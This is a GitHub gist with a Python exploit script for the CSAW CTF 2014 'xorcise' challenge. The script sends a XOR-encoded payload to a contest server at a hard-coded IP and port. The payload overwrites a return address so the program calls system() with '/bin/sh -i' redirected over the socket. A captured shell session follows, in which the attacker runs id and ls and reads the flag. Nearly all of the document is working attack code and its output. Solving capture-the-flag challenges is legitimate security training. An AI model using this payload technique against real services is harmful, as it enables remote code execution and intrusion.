Created
September 21, 2014 22:33
-
-
Save g05u/9e1ae04ad1252f709bb7 to your computer and use it in GitHub Desktop.
CSAW CTF 2014 - xorcise exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct, sys, time | |
| from nulllife import * | |
| #CSAW 2014 CTF | |
| #xorcise exploit | |
| def xor(data, key): | |
| o = '' | |
| for i in range(len(data)): | |
| o += chr(ord(data[i]) ^ ord(key[i%len(key)]) ^ 0x8F) | |
| return o | |
| key = "\x8F" + "\x8A" + "\x8F" * 3 + "\x9C" + "\x7B" + "\x99" #overwrite ret decipher x plt@system | |
| cmd = "/bin/sh -i <&4 >&4 2>&4" | |
| cmd += "\x00" * (128 - len(cmd)) | |
| s = NullSocket("128.238.66.227", 24001) | |
| s.write(chr(135) + key + xor(cmd, key)) | |
| s.interactive() | |
| ''' | |
| sh: cannot set terminal process group (134): Inappropriate ioctl for device | |
| sh: no job control in this shell | |
| sh-4.3$ id | |
| id | |
| uid=1000(xor) gid=1000(xor) groups=1000(xor) | |
| sh-4.3$ ls -la | |
| ls -la | |
| total 44 | |
| drwxr-xr-x 2 root root 4096 Sep 20 00:18 . | |
| drwxr-xr-x 3 root root 4096 Sep 14 14:14 .. | |
| -rw-r--r-- 1 root root 30 Sep 20 00:18 flag.txt | |
| -rw-r--r-- 1 root root 7 Sep 12 19:13 password.txt | |
| -rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise | |
| -rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c | |
| sh-4.3$ cat flag.txt | |
| ceat flag.txt | |
| flag{code_exec>=crypto_break} | |
| sh-4.3$ exit | |
| exit | |
| exit | |
| *** Connection closed by remote host *** | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment